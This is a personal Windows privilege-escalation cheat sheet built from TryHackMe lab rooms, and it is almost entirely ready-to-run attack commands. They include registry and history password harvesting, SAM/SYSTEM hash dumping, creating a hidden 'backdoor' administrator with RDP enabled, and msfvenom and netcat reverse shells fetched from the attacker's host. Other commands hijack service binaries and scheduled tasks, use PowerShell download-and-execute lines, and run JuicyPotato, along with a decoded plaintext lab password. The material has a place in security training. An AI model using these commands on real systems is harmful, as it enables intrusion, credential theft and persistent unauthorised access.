Windows

Copy info from here: https://tryhackme.com/room/windowsprivesc20

Gathering Info

whoami /priv

net user

systeminfo

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

dir c:\

dir "c:\program files"

dir "c:\program files (x86)"

wmic service get name,startname

wmic service get name,pathname,startname | findstr "Program Files"

Find text in file

type C:\Windows\path\to\file\$FILE | findstr $STRING

Find passwords

reg query HKLM /f password /t REG_SZ /s

Whoami /priv

Finding	Comment	Examples
SeImpersonatePrivilege	Printspoofer - works on Windows 10 and Server 2016/2019	RelevantStealth
SeImpersonatePrivilege	Using EfsPotato	Stealth

Harvesting Passwords from Usual Spots

Might be able to find interesting files by looking at what was recently accessed. Start -> run -> recent.

Powershell history

Examples

Harvesting Passwords from Usual Spots

Victim(cmd)

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Examples

Harvesting Passwords from Usual Spots

Need GUI to see other command prompt that will be spawned

Victim(cmd)

cmdkey /list
runas /savecred /user:$DOMAIN\$USERNAME cmd.exe

Examples

Harvesting Passwords from Usual Spots

Retrieve the saved password stored in the saved PuTTY session under your profile.

Victim(cmd)

reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s

See hidden files

Examples

Anthem

System and Sam

Download system and sam

Examples

Tampering With Unprivileged Accounts

Kali(WinRM)

reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak

Dump hashes

Examples

Tampering With Unprivileged Accounts

Kali

python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL

Add User & Assign Group Memberships

Victim

net user backdoor pass!123 /add
net localgroup Administrators backdoor /add
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v forceguest /t reg_dword /d 0 /f

Enable RDP

Victim

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Add user to RDP Group

Examples

Assign Group Memberships

Add user to group that allows them to RDP

Victim(cmd)

net localgroup "Remote Management Users" $USER /add

Scheduled Tasks

Examples

Windows Privilege EscalationAbusing Scheduled Tasks

Looking into scheduled tasks on the target system, you may see a scheduled task that either lost its binary or it's using a binary you can modify.

Scheduled tasks can be listed from the command line using the schtasks command without any options. To retrieve detailed information about any of the services, you can use a command like the following one:

Victim(cmd)

schtasks 

Victim(cmd)

schtasks /query /tn $TASK /fo list /v

Victim(cmd)

icacls c:\tasks\schtask.bat

Kali

nc -lvnp 4444

Victim

echo c:\tools\nc64.exe -e cmd.exe $KALI 4444 > C:\tasks\schtask.bat
schtasks /run /tn $TASK 

Abusing Service Misconfigurations

Examples

Abusing Service Misconfigurations

Insecure Permissions on Service Executable

Get the flag on svcusr1's desktop

Victim(cmd)

sc qc WindowsScheduler

Victim(cmd)

icacls C:\PROGRA~2\SYSTEM~1\WService.exe

Kali

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4445 -f exe-service -o rev-svc.exe
python2 -m SimpleHTTPServer 81

Victim(Powershell)

wget http://$KALI:81/rev-svc.exe -O rev-svc.exe

Once the payload is in the Windows server, we proceed to replace the service executable with our payload. Since we need another user to execute our payload, we'll want to grant full permissions to the Everyone group as well.

Victim(Powershell)

cd C:\PROGRA~2\SYSTEM~1\
move WService.exe WService.exe.bkp
move C:\Users\thm-unpriv\rev-svc.exe WService.exe
icacls WService.exe /grant Everyone:F

Kali

nc -lvp 4445

Note: PowerShell has sc as an alias to Set-Content, therefore you need to use sc.exe in order to control services with PowerShell this way.

As a result, you'll get a reverse shell with svcusr1 privileges:

Victim(cmd)

sc stop windowsscheduler
sc start windowsscheduler

OR

Victim(Powershell)

sc.exe stop windowsscheduler
sc.exe start windowsscheduler

Unquoted Service Paths

Examples

Unquoted Service Paths

Victim(cmd)

 sc qc "disk sorter enterprise"

Kali

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4446 -f exe-service -o rev-svc2.exe
python2 -m SimpleHTTPServer 81

Victim(Powershell)

wget http://10.10.15.215:81/rev-svc2.exe -O rev-svc2.exe
move C:\Users\thm-unpriv\rev-svc2.exe C:\MyPrograms\Disk.exe
icacls C:\MyPrograms\Disk.exe /grant Everyone:F

Kali

nc -lvp 4446

Victim(cmd)

sc.exe stop "disk sorter enterprise"
sc.exe start "disk sorter enterprise"

Insecure Service Permissions

Examples

Insecure Service Permissions

Victim(cmd)

cd C:\tools\AccessChk
accesschk64.exe -qlc thmservice

Kali

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$KALI LPORT=4447 -f exe-service -o rev-svc3.exe
python2 -m SimpleHTTPServer 81

Victim(Powershell)

wget http://10.10.15.215:81/rev-svc3.exe -O rev-svc3.exe

Kali

nc -lvp 4447

Victim(Powershell)

icacls C:\Users\thm-unpriv\rev-svc3.exe /grant Everyone:F
sc.exe config THMService binPath= "C:\Users\thm-unpriv\rev-svc3.exe" obj= LocalSystem
sc.exe stop THMService
sc.exe start THMService

Abusing dangerous privileges

Examples

Abusing dangerous privileges

Kali

nc -lvp 4442

Victim(Browser)

c:\tools\RogueWinRM\RogueWinRM.exe -p "C:\tools\nc64.exe" -a "-e cmd.exe 10.10.22.165 4442"

Bypassing UAC

Examples:

Bypassing UAC

Bypassing Applocker

Examples:

Bypassing Applocker

Load PowerUp.ps1 into memory.

Kali

wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
python2 -m SimpleHTTPServer 81

Add the following line at the bottom to PowerUp.ps1 so it Invokes all checks automatically once downloaded

PowerUp.ps1

Invoke-AllChecks

Victim(powershell)

powershell -ep bypass
iex​(New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1') 

Kali

echo "dHFqSnBFWDlRdjh5YktJM3lIY2M9TCE1ZSghd1c7JFQ=" | base64 -d

Kali

xfreerdp +clipboard /u:"Administrator" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: tqjJpEX9Qv8ybKI3yHcc=L!5e(!wW;$T

Privilege Escalation

Automated Enumeration Tools

Name	Link
WinPeas
PowerUp.ps1	https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1
Windows Exploit Suggester	https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
SharpHound	git clone https://github.com/BloodHoundAD/BloodHound.git
Powerview

Juicy Potato

Examples

Retro

• Download Juicy Potato to your attack machine

• Upload Juicy Potato to the target (ex: via FTP, SMB, HTTP, etc.)

• Create a reverse shell and upload it to the target (ex: via FTP, SMB, HTTP, etc.) use Juicy Potato to execute your reverse shell

wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe

JuicyPotato.exe -l 5050 -p C:\path\to\reverse-shell.exe -t *

PowerUp.ps1

Examples

Privilege EscalationRetro

Setup

Kali

wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1 
python2 -m SimpleHTTPServer 81

Victim(cmd)

certutil -urlcache -f http://10.10.228.214:81/PowerUp.ps1 PowerUp.ps1 
. .\PowerUp.ps1 
Invoke-AllChecks

OR

Victim(powershell)

powershell -ep bypass
iex​(New-Object Net.WebClient).DownloadString('http://$KALI:81/PowerUp.ps1')

Windows Exploit Suggester

Examples

HackPark

Setup

Run command then paste output back to Kali in a file called systeminfo.txt

Victim

systeminfo

Kali

git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git 
cd Windows-Exploit-Suggester/ 
python3.9 windows-exploit-suggester.py --update 
python3.9 windows-exploit-suggester2.py --database 2022-12-03-mssb.xls --systeminfo systeminfo.txt

WinPeas

Examples

HackPark

Setup

Kali

wget https://github.com/carlospolop/PEASS-ng/releases/download/20221127/winPEASx64.exe 
python2 -m SimpleHTTPServer 82

Victim

cd C:\Windows\Temp
powershell "(New-Object System.Net.WebClient).Downloadfile('http://$KALI:82/winPEASx64.exe','winPEASx64.exe')" 
winPEASx64.exe

SharpHound

Examples

Post-Exploitation Basics

Add this line to SharpHound.ps1 before transferring so I could run the command right away

Victim

powershell -ep bypass
.\SharpHound.ps1

Kali

apt-get install bloodhound
neo4j console
bloodhound --no-sandbox

Find all Domain Admins

List all Kerberostable accounts

Powerview

Examples

Post-Exploitation Basics

Victim

Run below to be able to run PowerView commands.

powershell -ep bypass
. .\Downloads\PowerView.ps1

Enumerate the domain users.

Get-NetUser | select cn

Enumerate the domain groups.

Get-NetGroup -GroupName *admin*

Find Shared folders.

Invoke-ShareFinder

Get Operating systems on the network.

Get-NetComputer -fulldata | select operatingsystem